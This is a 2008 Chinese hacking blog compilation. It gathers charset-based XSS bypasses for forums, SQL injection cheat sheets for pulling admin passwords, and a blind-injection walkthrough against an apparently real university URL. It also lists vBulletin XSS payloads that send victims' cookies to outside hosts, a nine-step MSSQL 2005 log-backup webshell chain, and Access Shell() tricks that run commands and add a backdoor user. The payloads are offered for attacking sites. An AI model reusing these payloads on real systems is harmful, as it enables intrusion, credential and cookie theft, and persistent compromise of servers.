べヘ两个人的战役べヘ

字符集导致的浏览器跨站脚本攻击

mhnf@163.com(网络人生) — Tue, 17 Jun 2008 00:47:51 +0800

前言：这种利用类型的攻击早在06年就被安全研究人员指出，不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集，所以影响还是比较大，希望各大站快速修复。可以看看http://applesoup.googlepages.com/。

文中<已经被替换为〈,如果需要文档,请访问http://www.80sec.com/release/charset-xss.txt

在一般的web程序里，显示数据给浏览器的时候都会指定一个字符集，在国内平时我们用到的字符集有utf-8，GBK，gb2312等等，字符集指示了浏览器该如何对待返回的数据。其中gb2312和GBK字符集使用得非常广泛，但是经证明，IE在处理这些宽字符集的时候存在问题，导致可能程序的一些安全规则被Bypass掉，引发严重的跨站脚本安全漏洞。在IE里，如果它遇到一个字符，它是指定字符集里的第一位的时候，就会认为其后续字符和当前字符构成一个合法的字符，这样它在解析包括html标签，处理javascript，Css时都会做如此考虑，测试版本为ie6和ie7。

1 Bypass某些js的检查规则

〈HTML>
〈HEAD>
〈TITLE>80sec test〈/TITLE>
〈meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
〈/HEAD>
〈BODY>
〈script>
window.onerror=function(){
alert('Vul');
return true;
}
〈/script>
〈script>x='〈?php echo chr(0xC1);?>';y='[User_IN_PUT]‘;〈/script>
〈/BODY>
〈/HTML>

这里即使是过滤了〈>’\等字符一样可以利用非法字符集序列来实现\的作用，因为它会把原来存在的’给结合掉，然后前面的’找不到闭合，后面[User_IN_PUT]就可以用来执行js代码了。

2 Bypass某些属性的检查规则

为了避免直接使用html导致出现漏洞，一些论坛和程序使用了UBB标签，但是在gbk等多字节编码下，一样容易出现问题，以最容易出现问题的一个UBB标签为例子：

[color=xyz〈?php echo chr(0xC1);?>][/color]exploited

0xC1是一个gb2312的第一个字节，上面结果将会转化为：

〈font color="xyz?>〈/font>〈font color="abc onmouseover=alert(/xss/) s=?>exploited〈/font>

其中的

alert(/xss/)
将会做一个事件执行，所以即使UBB标签也变得不安全，能饶过”的保护。许多论坛都没有注意这点，phpwind，动网等论坛就容易受到这种攻击。而Discuz通过在转换结果之后附加一个空格，修补了这一安全问题。这里使用到ubb标签其实有一个很有意思的tips在里面，因为有的数据库会抛弃与指定字符集不匹配的字符，所以必须借助后面的]等字符来形成一个有效的汉字才能存储到数据库里，当然像ACCESS这种就不会有问题了，另外一些语言在处理字符串的时候会强制字符串的字符集类型，不合法的字符会导致转码的失败或者遭到抛弃，所以也不能利用这种类型的攻击。

3 几个小例子

Phpwind论坛charset跨站脚本漏洞

[email=xxxx onmouseover=alert() s=羃]Fuck Me
xxxxx

羃是一个特殊的十六进制编码和后面的]结合出来的字符，第一个种方法可以直接复制的：）
0xc1表示一个十六进制的字符编码

同样在dvbbs论坛也很容易产生一个xss代码如下

<font face="微软雅羃>xxxxxxxxxxx〈/font>〈font face=" onmouseover=alert() x=羃>xxxxxxxxxxx〈/font>

均在新版和老版测试通过。

4 关于修复

对于程序设计者，由于UTF-8字符集的可靠性，不存在这个安全漏洞，所以大家在设计站点的时候可以考虑使用UTF-8字符集。
对于广大开发者，可以牢记最小输入等于最大安全的原则，在匹配正则的时候限制输入的字符的范围，尽量匹配ascii字符，如果必须使用中文，可以考虑类似于discuz的在中文后面添加空格修复该问题。
对于广大用户，这个漏洞由于浏览器处理页面字符的不同，可以考虑使用如Firefox浏览器，可以避免一部分这样的问题。
本站内容均为原创，转载请务必保留署名与链接！
字符集导致的浏览器跨站脚本攻击:http://www.80sec.com/charset-xss.html

PHP注入技术语句

mhnf@163.com(网络人生) — Sun, 15 Jun 2008 04:09:06 +0800

' or '1=1

'/*

'%23

' and password='mypass

id=-1 union select 1,1,1

id=-1 union select char(97),char(97),char(97)

id=1 union select 1,1,1 from members

id=1 union select 1,1,1 from admin

id=1 union select 1,1,1 from user

userid=1 and password=mypass

userid=1 and mid(password,3,1)=char(112)

userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）

' and LENGTH(password)='6（探测密码长度）

' and LEFT(password,1)='m

' and LEFT(password,2)='my

…………………………依次类推

' union select 1,username,password from user/*

' union select 1,username,password from user/*

=' union select 1,username,password from user/* （可以是1或者=后直接跟）

99999' union select 1,username,password from user/*

' into outfile 'c:/file.txt （导出文件）

=' or 1=1 into outfile 'c:/file.txt

1' union select 1,username,password from user into outfile 'c:/user.txt

select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'

id=' union select 1,username,password from user into outfile

id=-1 union select 1,database(),version() （灵活应用查询）

常用查询测试语句，

select * FROM table where 1=1

select * FROM table where 'uuu'='uuu'

select * FROM table where 1<>2

select * FROM table where 3>2

select * FROM table where 2<3

select * FROM table where 1

select * FROM table where 1+1

select * FROM table where 1--1

select * FROM table where ISNULL(NULL)

select * FROM table where ISNULL(COT(0))

select * FROM table where 1 IS NOT NULL

select * FROM table where NULL IS NULL

select * FROM table where 2 BETWEEN 1 AND 3

select * FROM table where 'b' BETWEEN 'a' AND 'c'

select * FROM table where 2 IN (0,1,2)

select * FROM table where CASE WHEN 1>0 THEN 1 END

例如：夜猫下载系统1.0版本

id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 （替换，寻找密码）

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 （验证第一位密码）

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 （第二位）

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51

…………………………………………………………

例如2：灰色轨迹变换id进行测试（meteor）

union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate

union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate

构造语句：

select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)

select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)

union%20(select%201,0,2,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate

union%20(select%201,0,12695,'1999-01-01','a',password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate

union%20(select%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20where%20username='sandflee')%20order%20by%20eventdate （查沙子的id）

（select a FROM table_name where a=10 AND B=1 orDER BY a LIMIT 10)

select * FROM article where articleid='$id' union select * FROM……（字段和数据库相同情况下，可直接提交）

select * FROM article where articleid='$id' union select 1,1,1,1,1,1,1 FROM……（不同的情况下）

特殊技巧：在表单，搜索引擎等地方写：

"___"

".__ "

"%

%' orDER BY articleid/*

%' orDER BY articleid#

__' orDER BY articleid/*

__' orDER BY articleid#

$command = "dir c:\";system($command);

select * FROM article where articleid='$id'

select * FROM article where articleid=$id

1' and 1=2 union select * from user where userid=1/* 句中变为

(select * FROM article where articleid='1' and 1=2 union select * from user where userid=1/*')

1 and 1=2 union select * from user where userid=1

语句形式：建立一个库，插入：

create DATABASE `injection`

create TABLE `user` (

`userid` int(11) NOT NULL auto_increment,

`username` varchar(20) NOT NULL default '',

`password` varchar(20) NOT NULL default '',

PRIMARY KEY (`userid`)

) ;

insert INTO `user` VALUES (1, 'swap', 'mypass');

插如一个注册用户：

insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');

"insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')";

insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')

"insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'";

insert INTO membres SET login='',password='',nom='',userlevel='3',email=''

"insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')";

update user SET password='$password', homepage='$homepage' where id='$id'

update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id'

"update membres SET password='$pass',nom='$nom',email='$email' where id='$id'";

update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]'

"update news SET Votes=Votes+1, score=score+$note where idnews='$id'";

长用函数：

DATABASE()

USER()

SYSTEM_USER()

SESSION_USER()

CURRENT_USER()

比如：

update article SET title=$title where articleid=1 对应函数

update article SET title=DATABASE() where id=1

#把当前数据库名更新到title字段

update article SET title=USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=SYSTEM_USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=SESSION_USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=CURRENT_USER() where id=1

#把当前会话被验证匹配的用户名更新到title字段

：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：
$req = "select * FROM membres where name like '%$search%' orDER BY name";

select * FROM membres where name like '%%' orDER BY uid#%' orDER BY name

select * FROM membres where name like '%%' orDER BY uid#%' orDER BY name

select uid FROM admins where login='' or 'a'='a' AND password='' or 'a'='a' （经典）

select uid FROM admins where login='' or admin_level=1#' AND password=''

select * FROM table where msg like '%hop'

select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''

select * FROM membres where name like '%%' orDER BY uid#%' orDER BY name

ASP+acc手工注入折叠展开

mhnf@163.com(网络人生) — Sat, 14 Jun 2008 04:11:38 +0800

SQL注入这么长时间，看见有的朋友还是不会手工注入，那么我来演示一下。高手略过。
我们大家知道，一般注入产生在没经过虑的变量上，像ID?=XX这样的。
下面以这个网址为例：

http://zsb.xxx.edu.cn/2j.asp?id=24 and 1=1 返回了正常
 http://zsb.xxx.edu.cn/2j.asp?id=24 and 1=2 返回了错误
1=1是一个真，1=2是一假，所以会返回一个正常一个错误。
SQL数据就会变成如下：
select * from 表名 where 字段='24'
或者:
http://zsb.xxx.edu.cn/2j.asp?id=24 and '1'='1'
http://zsb.xxx.edu.cn/2j.asp?id=24 and '1'='2'

注入存在了，判断数据库是ACC或MSS的，利用系统表
ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限，而SQL-SERVER的系统表是sysobjects,
在WEB环境下有访问权限。对于以下两条语句：

http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from sysobjects)>0
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from msysobjects)>0
若数据库是SQL-SERVE，则第一条，网页，一定运行正常，第二条则异常；若是ACCESS则两条都会异常。
我们提交后两条后都为异常，可以判断为ACC的数据库。
图3。

http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from 表名)>0
如果表名存在就会返回正常，反页错误。
刚开始我提交：
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from admin)>0
返回错误，说明不存在ADMIN这个表，当后来提交这个返回正常：
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from article_admin)>0
说明存在article_admin这个表。
猜列名：
and (select count(字段名) from article_admin)>0
提交：
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(username) from article_admin)>0
返回了正常，接着提交：
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(password) from article_admin)>0
返回了正常，说明存在username和password这两个字段名。
猜用户名和密码长度；
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 len(username) from article_admin)=5
返回正常，说明username内容长度为5
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 len(password) from article_admin)=16
正常，password内容长度为16，也就是MD5的值。

猜用户名和密码内容：
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 asc(mid(username,1,1)) from article_admin)=97
返回了正常，说明第一username里的第一位内容是ASC码的97，也就是a。
猜第二位把username,1,1改成username,2,1就可以了。
猜密码把username改成password就OK了。

vBulletin Hack

mhnf@163.com(网络人生) — Sat, 14 Jun 2008 04:06:19 +0800

2.3.* - SQL injection
Quote:www.strona.com/forumpath/calenda ... edit&eventid=14 union (Select allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events Where eventid = 14) order by eventdate

2.*.* - XSS
Quote:[E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));

vBulletin 3.0
混世魔王：收集：vBulletin 的注入漏洞很少,国外对付VBB的办法是XSS到admin 的hash,然后用vBulletin Hash cracker2.0 破解.
3.0.0 - XSS
Quote:www.strona.com/forumpath//search ... wposts=0&query=<script>im g = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;</script>

3.0-3.0.4
Quote:www.strona.com/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system

3.0.3–3.0.9 XSS
Quote:<body onLoad=img = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;>

3.0.9 and 3.5.4 - XSS
Quote:www.strona.com/forumpath/newthre ... ect=1234&WYSIWY G_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&post hash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttim e='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4% E0%F2%FC+%ED%EE%E2%F3%FE+%F2% E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3 &postpoll=yes&polloptions=1234&openclose=1&stickun stick=

1&iconid=0

vBulletin 3.5
Quote:TITLE:--------->Test<script>img = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;</script>
BODY:---------->Obojętnie
OTHER OPTIONS:->Obojętnie

3.5.3 - XSS
Quote:www.strona.com/forumpath/profile.php?do=editpassword
pass:Twoje hasło
email: jakis@email.com”><script>img = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;</script>.nomatt
Note About lenght limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
www.strona.com/forumpath/sendmessage.php?do=mailmember&u={your id}

3.5.4
Quote:www.strona.com/forumpath/install/upgrade_301.php?step=SomeWord

3.5.4 - XSS
Quote:www.strona.com/forumpath/inlinem ... l=lala2%0d%0aConten t-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

Moduły do vbulletin

vBug Tracker 3.5.1 - XSS
Quote:www.strona.com/forumpath/vbugs.p ... ug_typeid=0&vbu g_statusid=0&vbug_severityid=0&vbug_versionid=0&as signment=0&sortfield=lastedit&sortorder=%22%3Cscri pt%3Eimg= new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E

ImpEx 1.74
Quote:www.strona.com/forumpath/impex/I ... wnload/r57shell.txt
www.strona.com/forumpath/impex/I ... ../../../etc/passwd

ibProArcade 2.x - SQL injection
Quote:www.strona.com/forumpath/index.p ... =report&user=-1 union select password from user where userid=[any_user]

google dork:
Code:
"Powered by vBulletin Version [numer_version]"

Mssql2005 Log备份Webshell

mhnf@163.com(网络人生) — Fri, 13 Jun 2008 04:16:03 +0800

注:转载就注入出自'孤孤浪子博客'原创
http://itpro.blog.163.com
各位拿站的朋友。是不是感觉到现在mssql2000一部分都升级到mssql2005了，目前网络上大多数log备份和差异备份WebShell都针对sql2000的数据库而开发的。那么碰到2005的数据库怎么办呢。不用急，请按照以下方式继续可以拿到webshell。by:孤狐浪子 qq:393214425
第一步
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--

第二步：
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第三步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--

第四步
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--

第五步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第六步
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--

第七步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第八步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--

第九步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

ACCESS高级注入

mhnf@163.com(网络人生) — Fri, 13 Jun 2008 04:10:48 +0800

现在我们在脚本注入攻击的技术中,常用的手法分好多种,最普通的是利用子查询或者是Union联合查询来取得一些特殊表中的内容,比如Admin,Log表等等,这是一种纯粹的对数据库的攻击方式,而MSSQL Server的方法则更为多样和复杂,
当我们取得连接权限较高的注入点的时候,我们可以利用MSSQL Server本身所带的扩展来执行命令，或者是获取目录,读取文件与修改注册表;在低权用户的连接中，我们则可以试用差异备份,
或者干脆就是跑数据库等方式来实现对系统的直接攻击或者是间接的攻击.再则则是类似于Oracle\MySQL\DB2这些非MS直接支持的数据库关于他们,我们也有多种多样的攻击手法,执行命令,导出文件或读取文件等.
以上是一些我们针对常用数据库的攻击方式的大体总结,不难看出，其中最鸡肋的,要算是Access的数据库了.一来在Access中,无法直接获取数据库中的表名和字段名称,二来在Access中,我们能做的东西非常少,
再说也不支持多语句的SQL语法,和T-SQL的标准又有不少的区别,让人觉得Access数据库中仅有的Insert,Update,Select,Delte,Produce仅仅是对SQL语句的封装而已.所以,我们依旧需要对Access进行研究.
在这篇研究笔记中,我所参考的文章和资料,有部分来自nsfocus和xFocus早在2000-2002年的文档,另一篇则是SuperHei所发表的<关于Access的一些测试>,
大家可以在http://www.4ngel.net/安全天使安全小组的网站上查询到.OK,废话不要太多,我们继续研究.
我们可以去翻看微软在刚推出Windows 2000的时候曾经出现过几个非常大的脚本漏洞的漏洞公告，其中比如cateloy_type.asp的远程注入漏洞和Msadscs.dll漏洞等都涉及了与现在的攻击手法或者是常用的利用方法极为不同的地方,
比如Catelog_type.asp的注入漏洞,它的代码中出现的问题是这样的:
"select * from cateloy where type='" & Requset("Type") & "'"
谁都能看明白这是一个非常低级的注入漏洞,直接将Type的值放入SQL语句中查询,并没有估计到用户的恶意输入.
如果换作现在,我们基本上只有拿来跑表份,幸好MS没设置类似PHP的gpc,否则我们将一事无成.但是我们可以查看这篇漏洞资料的利用方式,其中涉及到了一个SQL语句:
Select * from Sometable where somefield='|Select Shell("cmd.exe /c dir")|'
关于这个语句的介绍,是漏洞资料中所说的,Access允许用"|"来创建VBA函数,导致命令被执行,其实这只是Access内置的一个特殊函数而已,相类似的还有cudir和Command函数.具体的我们可以在Access中测试.测试的SQL语句如下:
Select Shell("cmd.exe /c dir c:\ > c:\kevin.txt")
回到C盘,我们果然看到了kevin.txt.说明语句执行成功了.
然后我们将其转到脚本中测试吧.编写如下的VBS脚本
Set Conn=Createobject("Adodb.Connection")
Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=kevins4t.mdb"
Set Rs=Conn.execute("Select Shell(""cmd.exe /c dir c:\ > c:\kevin.txt"")")
Msgbox Rs(0)
这一此出现的结果很出乎我们的意料,错误的原因是"表达式中的'Shell'函数未定义".现在我们需要安静下来喝杯咖啡然后思考为什么同样的语句在不同的执行者间会出现如此截然不同的问题.一个能正常执行,
而另外一个则是找不到函数.试想微软一定在其中的什么地方设置了一个开关,那么我们就去微软的知识库去了解一下.
在微软的一篇关于沙盒模式的文档中,我们了解到一些内容:
为了安全起见,MS在Jet引擎的Sp8中,设置了一个名为SandBoxMode的开关,这个开关是开启一些特殊函数在另外的执行者中执行的权限的.它的注册表位置在
HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode里,默认是2.微软关于这个键值的介绍为:0为在任何所有者中中都禁止起用安全设置,1为仅在允许的范围之内,
2则是必须是Access的模式下(这就是为什么我们能在Access中执行成功的原因.),3则是完全开启,连Access中也不支持.
那么好吧,我们来看看如果将值变为0将会怎样.
这次运行我们的VBS的时候,出现的情况是一组数字,再在C盘下查看文件,果然看到了我们的kevin.txt.很神奇吧.原来Access也是可以执行命令的,只是微软这家伙总是懒得说出来而已.但是如果在实际方面会怎样呢?
一.后门的设置
我们的运用将会很窄.真的,一来我们需要的权限很高,起码要到能改注册表的权限,默认是Admin和LocalSystem,二来是我们将如何修改注册表，远程吗?没门的.所以我们只好将其当作一个后门用.
只要我们修改了注册表的值,那么在普通的注入语句中,这是一个很不错的后门方式,最起码可以在外部执行一些小小的命令什么的.
比如我们在渗透某个站点的时候拿到了最高权限,并且修改了这个SandBoxMode,之后我们被管理员扫地出门了.那么,在首页的某个地方依旧存在这一个Select的注入点,这样最好,我们让服务器执行如下的SQL就行了.
InjectionURL' and 0<>(select shell("cmd.exe /c net user > c:\inetpub\wwwroot\kevins4t.txt"))%00
这样我们就可以一步一步的将重新服务器拿下.
二.远程攻击
这将是一个很有意思的话题.首先我们必须有修改注册表的权限,二是有修改注册表的条件,三是可以执行SandboxMode的环境,必须三样同时满足才行,到底是在什么情况下呢?
我们知道,我们平时在杂志上看到的文章,很多的无非就是在一个以Sa连接的InjectionURL中苦苦挣扎,一是执行命令,如果去掉了扩展或者是将扩展需要的DLL移走,我们将一无所用.那么聪明的你是否想到了方法?
我们知道,只有Sa的权限才有可能去打开另外一个Access的连接的,当我们满足了打开Access的条件的同时,我们也满足了修改注册表的条件和权限,因为MSSQL有一个名为xp_regwrite的扩展,它的作用是修改注册表的值.语法如下
exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value
那我们只要将SandBoxMode修改为0或者1就成功了.然后则是MSSQL的OpenRowSet函数,它用于打开一个特殊的数据库或者连接到另一个数据库之中.当我们具备SysAdmin的权限的时候,我们就可以做到打开Jet引擎.那么我们只要连接到一个Access数据库中,
然后执行命令就可以了.但是关键的问题是如何寻找这个Access数据库.
关于这个问题我以前想了很多,一开始是想,利用目录便历来查询数据库的位置.但是这种方法成功率不会很高,有的时候我们碰到很多的站点都设置了非常好的权限,无法找到MDB数据库.这是最为烦恼的地方.
不过后来我想到了一些前人用过的方式,系统里本来就有2-3个现存的数据库嘛,何必费神的去找呢?它们的位置在%windir%\system32\ias\ias.mdb或者%windir%\system32\ias\dnary.mdb这样一来,我们有了执行宿主,就没什么好怕的了.执行一下我们所需要的命令吧
InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user kevin 1986 /ad")');--
这样,我们就执行了命令了.而且继承的是MSSQL的LocalService的System权限.

--------------------------------------------------------------------------------------------------------------------------------------------------------

用户表
Select Name FROM msysobjects Where Type = 1 and flags=0
所有表
Select Name FROM msysobjects Where Type = 1

判断版本：
Select NULL FROM MSysModules2  '97
Select NULL FROM MSysAccessObjects '97 2000
Select NULL FROM MSysAccessXML '2000 2002-2003
Select NULL FROM MSysAccessStorage '2002-2003 2007

SandBoxMode:
SandBoxMode的开关,这个开关是开启一些特殊函数在另外的执行者中执行的权限的.它的注册表位置在
HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode里,默认是2.
微软关于这个键值的介绍为:0为在任何所有者中中都禁止起用安全设置,1为仅在允许的范围之内,
2则是必须是Access的模式下(这就是为什么我们能在Access中执行成功的原因.),3则是完全开启,连Access中也不支持.

执行命令：
Select Shell("cmd.exe /c dir c:\ > c:\kevin.txt")

读文件
Select *  FROM [TEXT;DATABASE=c:\;HDR=NO;FMT=Delimited].[kevin.txt]

写文件：【不能在子查询和UNION查询中，实用价值不大】
Select "text to write"  into [TEXT;DATABASE=c:\;HDR=NO;FMT=Delimited].[kevin1.txt]

当前路径：sandboxing enable
select curdir() from msysaccessobjects
select dir('c:\ ') from msysaccessobjects
select environ(1) from msysaccessobjects
select filedatetime('c:\boot.ini') from msysaccessobjects
select filelen('c:\boot.ini') from msysaccessobjects
select getattr('c:\ ') from msysaccessobjects
select shell('cmd.exe /c dir c:\ > c:\kevin.txt') from msysaccessobjects

跨文件查询：
Select *  FROM dv_address IN 'D:\dailian\bbs\Dvbbs8.2.0_Ac\Data\IPaddress.mdb'

连接MSSQL:
Select * FROM [ODBC;DRIVER=SQL SERVER;Server=(local);UID=sa;PWD=2853wang; DATABASE=master].Information_Schema.Tables

参考资料：
http://www.tr4c3.com/SecDocs/ACCESS%20THROUGH%20ACCESS.pdf

BBSXP最新漏洞及发现过程

mhnf@163.com(网络人生) — Fri, 13 Jun 2008 04:07:16 +0800

操作环境：Micromedia Dreamweaver 8.0+IIS 5.0+SQL Server 2000+BBSXP 6.00 SP1 SQL
出差回来的这几天工作比较轻松，正好为大家献上前几天发现的BBSXP新漏洞，顺便给大家介绍一下查找ASP程序漏洞的方法。看到这里你应该会想到NBSI吧？没错，NBSI的确是一个不错的漏洞检测和利用的工具，但它只能针对有规律可循的简单的漏洞。从软件测试的角度来说它使用的是黑盒测试方法。而现在我要告诉大家的是白盒测试方法：从源代码中去查找漏洞（安全系数比较高的BUG）。
在开始之前要先选择一个顺手的工具，我用的是Dreamweaver 8.0。首先在DW中创建一个站点。
下面给大家介绍一些相关的理论基础，（脚本小子：这个时候千万不要不耐烦。如果到这里就不耐烦了，那你就只能做一只小菜鸟）目的是为了让大家摆脱知其然而不知其所以然的困境。
由于在ASP中的所有漏洞都是由于没有严格校验从客户端接收的数据而造成的，所谓的数字型、字符型漏洞只是在SQL查询语句中的使用方法不同而已。而在程序中所有的数据校验和转换的过程都是包含在从数据接收到执行查询语句之间的，因此我们的关注点就要放在获取客户端提交的数据与拼接查询语句之间的数据校验过程中。
为了简化查找的过程，我们要从一些关键字入手。利用Dreamweaver的搜索功能把可能会存在漏洞的位置查找出来。在ASP中接收客户端数据的方法不外乎Request对象，使用方法包括且类似于Request(“ForumID”)、Request.QueryString(“ForumID”)、Request.Form(“ForumID”)、Request.Cookies(“ForumID”)。因此只需要搜索Request关键字就可以了。
文件名中包含Admin的就不需要再看了，因为我们不可能在普通用户的状态下访问到这些文件。双击Bank.asp中的一个搜索结果在编辑窗口中可以看到下面的代码：
qmoney=int(Request("qmoney"))
if qmoney > Rs("UserMoney") then error("<li>您的现金没有这么多吧！")
if qmoney<1 then error("<li>存款不能为零！")

Rs("savemoney")=Rs("savemoney")+qmoney+accrual
Rs("UserMoney")=Rs("UserMoney")-qmoney
Rs("SaveMoneyTime")=now()
Rs.update
Rs.close
这里使用了int方法进行了数据转换，同时使用Recordset字段赋值后保存数据，这么做是不可能产生漏洞的。事实上两个方法中只要使用了任意一个都无法注入，因此可以将类似的数据使用方法忽略。
双击Friends.asp中的搜索结果可以找到如下代码：
incept=HTMLEncode(Request("incept"))
UserName=HTMLEncode(Request("UserName"))

sub add
if UserName="" then error2("请输入您要添加的好友名字！")

if UserName=CookieUserName then error2("不能添加自己！")

If Conn.Execute("Select id From [BBSXP_Users] where UserName='"&UserName&"'" ).eof Then error2("数据库不存在此用户的资料！")
从查询语句上可以看出：如果UserName变量中包含单引号的话将会产生字符型注入漏洞。所以需要在UserName从客户端获取到拼接查询语句的过程中使用HTMLEncode方法来进行过滤，此法的实现逻辑如下：
function HTMLEncode(fString)
fString=Replace(fString,";",";")
fString=Replace(fString,"<","<")
fString=Replace(fString,">",">")
fString=Replace(fString,"\","\")
fString=Replace(fString,"--","--")
fString=Replace(fString,CHR(9)," ")
fString=Replace(fString,CHR(10),"<br>")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22)," ")
fString=Replace(fString,CHR(32)," ")
fString=Replace(fString,CHR(34),""")'双引号
fString=Replace(fString,CHR(39),"'")'单引号
fString=ReplaceText(fString,"&#([0-9]*);","&#$1;") '解决韩文字符问题
if IsSqlDataBase=0 then '过滤片假名(日文字符)[\u30A0-\u30FF] by yuzi首创
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","&#x30$1;")
fString=unescape(fString)
end if
HTMLEncode=fString
end function
我们关注的方法中显然已经过滤了单引号，因此也就不会产生字符型注入漏洞。继续向下看搜索结果。如果看到类似的语句，且使用HTMLEncode方法过滤了，我们就可以认为它是安全的。
另外还有一些比较普遍的情况，类似于如下代码：
select case Request("menu")
case "add"
add
case "bad"
bad
case "Del"
Del
case "Post"
Post
case "look"
look
case "loadLog"
loadLog
case "addPost"
addPost
case ""
index
end select
在这段代码中menu的值没用被用到查询语句中，也就不可能产生注入漏洞，同样也可以忽略。
上面我说了很多种不会产生漏洞的代码，你一定是急着想知道什么样的代码才能产生漏洞吧？拿出一点耐心来，通过对上面的这几种情况进行排查分析后，在702个搜索结果中所剩的也就是只有十几个了。
